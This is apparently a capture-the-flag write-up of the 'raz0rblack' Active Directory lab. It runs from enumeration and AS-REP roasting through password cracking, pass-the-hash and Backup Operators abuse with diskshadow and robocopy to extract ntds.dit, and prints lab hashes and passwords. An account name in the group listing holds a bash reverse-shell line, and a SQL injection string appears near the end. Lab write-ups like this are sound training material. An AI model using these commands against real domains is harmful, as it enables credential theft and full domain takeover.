This room was really fun, I had to do a lot of reading and digging so got to learn a lot about Active Directory during the process.
PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-08-29 18:49:40Z) 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/tcp6 rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 2,3,4 111/udp6 rpcbind | 100003 2,3 2049/udp nfs | 100003 2,3 2049/udp6 nfs | 100003 2,3,4 2049/tcp nfs | 100003 2,3,4 2049/tcp6 nfs | 100005 1,2,3 2049/tcp mountd | 100005 1,2,3 2049/tcp6 mountd | 100005 1,2,3 2049/udp mountd | 100005 1,2,3 2049/udp6 mountd | 100021 1,2,3,4 2049/tcp nlockmgr | 100021 1,2,3,4 2049/tcp6 nlockmgr | 100021 1,2,3,4 2049/udp nlockmgr | 100021 1,2,3,4 2049/udp6 nlockmgr | 100024 1 2049/tcp status | 100024 1 2049/tcp6 status | 100024 1 2049/udp status |_ 100024 1 2049/udp6 status 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: raz0rblack.thm, Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 2049/tcp open mountd 1-3 (RPC #100005) 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: raz0rblack.thm, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3389/tcp open ms-wbt-server Microsoft Terminal Services |_ssl-date: 2022-08-29T18:50:36+00:00; -1s from scanner time. | ssl-cert: Subject: commonName=HAVEN-DC.raz0rblack.thm | Not valid before: 2022-08-28T18:48:06 |_Not valid after: 2023-02-27T18:48:06 | rdp-ntlm-info: | Target_Name: RAZ0RBLACK | NetBIOS_Domain_Name: RAZ0RBLACK | NetBIOS_Computer_Name: HAVEN-DC | DNS_Domain_Name: raz0rblack.thm | DNS_Computer_Name: HAVEN-DC.raz0rblack.thm | Product_Version: 10.0.17763 |_ System_Time: 2022-08-29T18:50:27+00:00 Service Info: Host: HAVEN-DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2022-08-29T18:50:29 |_ start_date: N/A | smb2-security-mode: | 3.1.1: |_ Message signing enabled and required
Initial nmap results. Lots to go at. We can see the DNS name so first thing to do is add it to /etc/hosts.
We’ll start with the open NFS share and see what’s there.
showmount -e raz0rblack.thm Export list for raz0rblack.thm: /users (everyone) sudo mount -t nfs 10.10.53.219:/users /mnt/users sudo ls -la /mnt/users total 17 drwx------ 2 nobody nogroup 64 Feb 27 2021 . drwxr-xr-x 3 root root 4096 Aug 29 20:30 .. -rwx------ 1 nobody nogroup 9861 Feb 25 2021 employee_status.xlsx -rwx------ 1 nobody nogroup 80 Feb 25 2021 sbradley.txt
Interestingly you can’t CD into folder (permission denied) but can sudo cp the files out to access them.
sbradley.txt contains another flag, and employee_status.xlsx contains a list of usernames we can enumerate.
daven port TF PLAYER imogen royce CTF PLAYER tamara vidal CTF PLAYER arthur edwards CTF PLAYER carl ingram TF PLAYER (INACTIVE) nolan cassidy CTF PLAYER reza zaydan TF PLAYER ljudmila vetrova CTF PLAYER, DEVELOPER,ACTIVE DIRECTORY ADMIN rico delgado WEB SPECIALIST tyson williams REVERSE ENGINEERING steven bradley STEGO SPECIALIST chamber lin TF PLAYER(INACTIVE)
I’m sure their roles aren’t so useful, but their names are. I can use a script from the CTF-Bash-Tools collection to create a list of usernames and run them through kerbrute against the box.
./kerbrute_linux_amd64 userenum -d raz0rblack.thm --dc 10.10.53.219 ~/Desktop/thm/raz0r/formatted_name_wordlist.txt
Kerbrute gives us 3 valid credentials.
__ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 08/29/22 - Ronnie Flathers @ropnop 2022/08/29 21:24:01 > Using KDC(s): 2022/08/29 21:24:01 > 10.10.95.102:88 2022/08/29 21:24:02 > [+] VALID USERNAME: lvetrova@raz0rblack.thm 2022/08/29 21:24:02 > [+] VALID USERNAME: twilliams@raz0rblack.thm 2022/08/29 21:24:02 > [+] VALID USERNAME: sbradley@raz0rblack.thm 2022/08/29 21:24:02 > Done! Tested 154 usernames (3 valid) in 1.060 seconds
I spent some time attempting to spray passwords with little luck so returned to the impacket suite to see what’s on offer.
We find GetNPUsers is able to dump AS REP hashes from incorrectly configured kerberos authentication.
python3 /opt/impacket/examples/GetNPUsers.py raz0rblack.thm/ -dc-ip 10.10.94.211 -usersfile users -format hashcat -outputfile ~/Desktop/thm/raz0r/hashes.txt Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [-] User sbradley doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User lvetrova doesn't have UF_DONT_REQUIRE_PREAUTH set
We’ll try with hashcat.
hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt --force --show $krb5asrep$23$twilliams@RAZ0RBLACK.THM:705d994b0e5a73e9d0367e3b425378ca$2382130e93e756f8420af94546d07293194cac4d75661c0a19caf47a817d4f99774a63abf9e4697d850a2936ae50c1eaf7e645caabb17140ce0689818c83e8ee0cde44d93284614283de03efc360455a79376c155864fa1c4acb4a702458067baf95cde656dcf894e9ae3a0ebf18ea0dbc40ad0f4312f4d4a652e0f054ee953c019d008a280d78ffa41d0b99b321d3e4dc033f902ee262f3bd8e54d8ff587b3fe5b58d79661e922d6d63b4ed893c4770a7c041b25caf9dd0fc6acac2e3e9b7c95391764be4eb02b3e51a15788f87a9ed9943797078fd1b80fd03f1c4af9fef31817c0c04a7c62cb79765950c2da8b149:roastpotatoes
Since this was at the top of the rockyou.txt list, I thought I’d try bruteforce the other users in the list. Interestingly instead of a failed login message we get PASSWORD_MUST_CHANGE for the user sbradley
raz0rblack.thm\sbradley:roastpotatoes STATUS_PASSWORD_MUST_CHANGE mbpasswd -r 10.10.56.82 -U sbradley Old SMB password: New SMB password: Retype new SMB password: Password changed for user sbradley
We set the new password to Password! because that’s super secure.
This user has read access to a folder called trash in the SMB share so lets grab all the files and have a look.
smb: \> ls
. D 0 Tue Mar 16 06:01:28 2021
.. D 0 Tue Mar 16 06:01:28 2021
chat_log_20210222143423.txt A 1340 Thu Feb 25 19:29:05 2021
experiment_gone_wrong.zip A 18927164 Tue Mar 16 06:02:20 2021
sbradley.txt A 37 Sat Feb 27 19:24:21 2021
5101823 blocks of size 4096. 1003387 blocks available
smb: \> mget *
The zip file will contain the answer to one of the questions, so using zip2john we dump the hash to a file and crack it.
john zip.hash -w=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (PKZIP [32/64]) Will run 6 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status electromagnetismo (experiment_gone_wrong.zip) 1g 0:00:00:01 DONE (2022-08-31 21:08) 0.9345g/s 7832Kp/s 7832Kc/s 7832KC/s elieus..elboty2009 Use the "--show" option to display all of the cracked passwords reliably Session completed.
Opening the zip file gives a system.hive and NTDS.dit which dumps a huge file of hashes. We’ve creds for 2 of the 3 verified usernames so we can try all of the hashes on the user lvetrova using cackmapexec again. We can use awk to trim the file to the 4th colon (the NTLM hash) and output into a new file for CME.
awk -F : '{print $4}' ntds.txt > ntdshashes.txtcrackmapexec smb 10.10.84.55 -u lvetrova -H ntdshashes.txt SMB 10.10.84.55 445 HAVEN-DC [*] Windows 10.0 Build 17763 x64 (name:HAVEN-DC) (domain:raz0rblack.thm) (signing:True) (SMBv1 :False) SMB 10.10.84.55 445 HAVEN-DC [-] raz0rblack.thm\lvetrova:1afedc472d0fdfe07cd075d36804efd0 STATUS_LOGON_FAILURE SMB 10.10.84.55 445 HAVEN-DC [-] raz0rblack.thm\lvetrova:7b8b14a73d8a45249de2f5b0c225d515 STATUS_LOGON_FAILURE SMB 10.10.84.55 445 HAVEN-DC [-] raz0rblack.thm\lvetrova:081af9630677a387f6f0a9bb17852602 STATUS_LOGON_FAILURE SMB 10.10.84.55 445 HAVEN-DC [-] raz0rblack.thm\lvetrova:c184a72ed800899bc1ff633778a89b5e STATUS_LOGON_FAILURE SMB 10.10.84.55 445 HAVEN-DC [+] raz0rblack.thm\lvetrova:f220d3988deb3f516c73f40ee16c431d
This user also has RDP access and crackmapexec tells us we can Evil-WinRM to the box.
The file lvetrova.xml tells us “Your Flag Is Here” but no flag. After a lot of googling I come across some posts explaining how Active Directory can store secrets in XML files, which can be extracted with the following.
#First import the file as a variable to use.
$ss =import-clixml -Path lvetrova.xml
#Then output the list in a formatted form
$ss.GetNetworkCredential() | Format-List
#Which gives us the following...
UserName : Your Flag is here =>
Password : THM{694362e877adef0d85a92e6d17551fe4}
SecurePassword : System.Security.SecureString
Domain :
While the crackmapexec was validating the hashes we were able to dump UserSPNs using an impacket script. With hashcat we get the username xyan1d3 and password cyanide9amine5628 which according to crackmapexec we can Evil-WinRM into also. The next question pertains to this user so let’s see where their flag is hidden.
This user has a similar XML file, which we can do exactly the same thing to obtain the flag.
Since we’re on an AD box, I’ll run Bloodhound and see if there’s any obvious mis-configurations to move laterally.
We can see that xyan1d3 is a member of backup operators which we can confirm in our Evil-WinRM shell.
*Evil-WinRM* PS C:\Users\xyan1d3\Documents> get-adgroupmember -identity "backup operators" distinguishedName : CN=bash -i \>&. /dev/tcp/10.8.156.189/8888 0\>&1,CN=Users,DC=raz0rblack,DC=thm name : bash -i >&. /dev/tcp/10.8.156.189/8888 0>&1 objectClass : user objectGUID : 89642a3b-44d6-47a8-abea-4b9135e45994 SamAccountName : xyan1d3 SID : S-1-5-21-3403444377-2687699443-13012745-1106
xyan1d3 doesn’t have access to the files in Administrator’s home folder but apparently we can use the function of a backup operator to obtain the ntds.dit and dump hashes. Because this is a live server ntds.dit is in use and we cannot do anything to it. We can use diskshadow to backup the live files and potentially access ntds.dit this way.
To do this, firstly create a script for diskshadow to run.
set verbose onX set metadata C:\Windows\Temp\meta.cabX set context clientaccessibleX set context persistentX begin backupX add volume C: alias cdriveX createX expose %cdrive% E:X end backupX
Then pass the file to diskshadow.
diskshadow /s backup.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: HAVEN-DC, 9/1/2022 2:04:45 AM
-> set verbose on
-> set metadata C:\Windows\Temp\meta.cab
-> set context clientaccessible
-> set context persistent
-> begin backup
-> add volume C: alias cdrive
-> create
Excluding writer "Shadow Copy Optimization Writer", because all of its components have been excluded.
Component "\BCD\BCD" from writer "ASR Writer" is excluded from backup,
because it requires volume which is not in the shadow copy set.
...Using robocopy, we can clone the backup ntds.
C:\files> robocopy /b E:\Windows\ntds . ntds.dit
-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------
Started : Thursday, September 1, 2022 2:10:28 AM
Source : E:\Windows\ntds\
Dest : C:\files\
Files : ntds.dit
Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
1 E:\Windows\ntds\
New File 16.0 m ntds.dit Copying these to our Kali box with smbserver and dumping with secretsdump gives us another hash file. This time with a more reasonable and up to date list of users. With Evil-WinRM we can pass the Administrator hash and log in as Administrator.
The root.xml file doesn’t import in the same way the others did, and gives us a cryptographic error. After diving down another rabbit hole, I realise upon inspection of the xml file it was just hex encoded, so we can quickly retrieve the flag…
Look this is your cookie. FunFact : This cookie can change its own flavour automatically. To test it just think of your favourite flavour. And stop putting 'OR '1'='1 inside login.php Enjoy your Cookie
Inside the cookie.json there’s a base64 encoded text of the above, so after a bunch of digging we find the folder “Top Secret” inside “C:\Program Files” containing the following PNG.
This gives us the answer to the last question. The way to save and exit vim. :wq